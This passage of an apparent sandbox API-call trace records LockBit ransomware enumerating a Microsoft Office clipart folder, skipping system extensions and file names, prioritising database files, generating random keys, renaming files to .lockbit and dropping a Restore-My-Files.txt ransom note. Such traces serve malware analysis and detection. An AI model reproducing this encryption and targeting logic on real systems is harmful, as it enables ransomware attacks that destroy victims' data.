returned -1 [0167.852] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.853] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.853] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03731_.WMF") returned 1 [0167.854] lstrcmpiW (lpString1="ntldr", lpString2="PE03731_.WMF") returned -1 [0167.854] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03731_.WMF") returned -1 [0167.854] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03731_.WMF") returned -1 [0167.854] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03731_.WMF") returned -1 [0167.854] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03731_.WMF") returned 1 [0167.854] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03731_.WMF") returned -1 [0167.854] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.854] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF") returned=".WMF" [0167.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.855] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.855] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.856] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.856] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF.lockbit") returned 72 [0167.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03731_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.857] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.857] malloc (_Size=0x40068) returned 0x3df0008 [0167.857] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2556) returned 1 [0167.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.858] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.864] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.864] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.865] free (_Block=0x1fa2ed8) [0167.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.866] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.866] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd176e300, ftCreationTime.dwHighDateTime=0x1bd4be7, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd176e300, ftLastWriteTime.dwHighDateTime=0x1bd4be7, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03795_.WMF", cAlternateFileName="")) returned 1 [0167.866] lstrcmpiW (lpString1=".", lpString2="PE03795_.WMF") returned -1 [0167.866] lstrcmpiW (lpString1="..", lpString2="PE03795_.WMF") returned -1 [0167.866] PathFindExtensionW (pszPath="PE03795_.WMF") returned=".WMF" [0167.866] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.866] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.867] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.868] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.868] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03795_.WMF") returned 1 [0167.869] lstrcmpiW (lpString1="ntldr", lpString2="PE03795_.WMF") returned -1 [0167.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03795_.WMF") returned -1 [0167.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03795_.WMF") returned -1 [0167.869] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03795_.WMF") returned -1 [0167.869] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03795_.WMF") returned 1 [0167.869] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03795_.WMF") returned -1 [0167.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF") returned=".WMF" [0167.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.869] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.869] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.871] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.871] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF.lockbit") returned 72 [0167.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03795_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.872] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.872] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.872] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1930) returned 1 [0167.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.873] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.873] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.879] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.879] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.880] free (_Block=0x1fa2ed8) [0167.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.880] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.880] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14937f00, ftCreationTime.dwHighDateTime=0x1bd4c05, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14937f00, ftLastWriteTime.dwHighDateTime=0x1bd4c05, nFileSizeHigh=0x0, nFileSizeLow=0x1020, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE04050_.WMF", cAlternateFileName="")) returned 1 [0167.880] lstrcmpiW (lpString1=".", lpString2="PE04050_.WMF") returned -1 [0167.880] lstrcmpiW (lpString1="..", lpString2="PE04050_.WMF") returned -1 [0167.880] PathFindExtensionW (pszPath="PE04050_.WMF") returned=".WMF" [0167.880] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.880] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.880] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.881] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.882] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.882] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE04050_.WMF") returned 1 [0167.883] lstrcmpiW (lpString1="ntldr", lpString2="PE04050_.WMF") returned -1 [0167.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE04050_.WMF") returned -1 [0167.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE04050_.WMF") returned -1 [0167.883] lstrcmpiW (lpString1="autorun.inf", lpString2="PE04050_.WMF") returned -1 [0167.883] lstrcmpiW (lpString1="thumbs.db", lpString2="PE04050_.WMF") returned 1 [0167.883] lstrcmpiW (lpString1="iconcache.db", lpString2="PE04050_.WMF") returned -1 [0167.883] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF") returned=".WMF" [0167.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.883] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.884] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.884] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF.lockbit") returned 72 [0167.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe04050_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.885] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.885] malloc (_Size=0x40068) returned 0x3d70450 [0167.885] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4128) returned 1 [0167.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: 